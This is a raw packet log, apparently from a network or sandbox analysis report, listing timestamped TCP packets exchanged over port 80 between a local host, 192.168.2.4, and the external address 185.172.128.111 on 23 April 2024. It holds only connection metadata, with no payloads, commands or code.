Apr 23, 2024 09:27:05.899868965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.899903059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.899914026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.899950981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.899976969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.899986982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.899996042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900022984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900028944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900058031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900060892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900120974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900224924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900259972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900290012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900295019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900311947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900331974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900355101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900382042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900557041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900624990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900732994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900732994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900752068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900789022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900804996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900831938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900887966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900924921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.900939941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.900979042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901110888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.901148081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.901176929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901190042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.901206970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901226997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.901252985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901264906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.901271105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901300907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.901321888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901344061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.901966095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902003050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902029037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902038097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902053118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902075052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902090073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902128935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902262926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902301073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902322054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902374029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902394056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902429104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902446985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902463913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902487993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902498960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902506113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902534008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902539968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902569056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902580976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902606964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902621031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902642965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.902651072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.902692080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.950750113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950787067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950822115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950855970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950890064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950923920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950958967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.950994015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951028109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951055050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951061964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951055050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951055050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951055050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951097965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951134920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951139927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951169968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951176882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951215029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951221943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951284885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951293945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951340914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951354027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951451063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951486111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951551914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951589108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951600075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951600075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951601028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951601028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951625109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:05.951675892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.951675892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:05.991219997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.197021008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303133965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303184032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303267956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303265095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303303003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303324938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303340912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303354025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303378105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303412914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303443909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303462029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303493023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303551912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303620100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303657055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303694010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303694963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303725958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.303736925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.303772926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.355912924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.355981112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356021881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356056929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356092930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356156111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356194973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356220007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356220961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356220961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356230021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356220961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356220961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356220961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356266975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356303930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356303930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356306076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356331110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356343031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356355906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356376886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356399059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356424093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356585026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356623888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356659889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356692076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.356753111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356754065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356754065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356754065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.356969118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357004881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357022047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357043028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357048988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357075930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357105970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357126951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357420921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357459068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357481956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357495070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357501030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357527971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.357542038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.357573032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408344030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408397913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408435106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408453941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408488035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408524990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408631086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408667088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408701897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408734083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.408772945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408773899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408773899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408773899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408773899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.408966064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409003019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409039021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409070969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409131050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409131050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409131050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409131050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409275055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409312963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409337044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409348011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409358978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409380913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409447908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409447908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409598112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409634113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409656048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409668922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409676075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409702063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409723043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409748077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.409946918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.409985065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410007000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410022020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410027981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410053968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410073042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410104990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410264015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410321951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410322905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410358906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410377979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410393953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410412073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410440922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410742998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410779953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410801888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410815954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410823107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410847902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.410867929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.410898924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411024094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411061049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411079884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411096096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411102057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411128998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411148071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411180019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411427975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411467075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411503077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411509991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411509991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411535978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411545992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411587000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411734104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411772966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411792994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411808968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411815882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411842108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.411860943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.411897898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412085056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412139893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412172079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412177086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412194967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412210941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412230968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412256956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412444115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412481070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412508965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412517071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412537098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412550926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.412568092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.412597895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461519003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461560011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461595058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461628914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461663961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461699963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461735010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461736917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461736917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461736917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461736917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461736917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461738110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461780071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461826086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461826086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.461936951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.461975098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462009907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462040901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462121010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462121964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462121964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462121964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462336063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462373018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462409019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462424040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462424040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462440968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462461948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462482929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462718964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462774038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462791920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462827921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462842941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462861061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.462867975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.462902069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463229895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463267088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463283062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463303089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463315010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463335991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463356972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463377953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463435888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463473082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463490009 CEST	49730	80	192.168.2.4	185.172.128.111
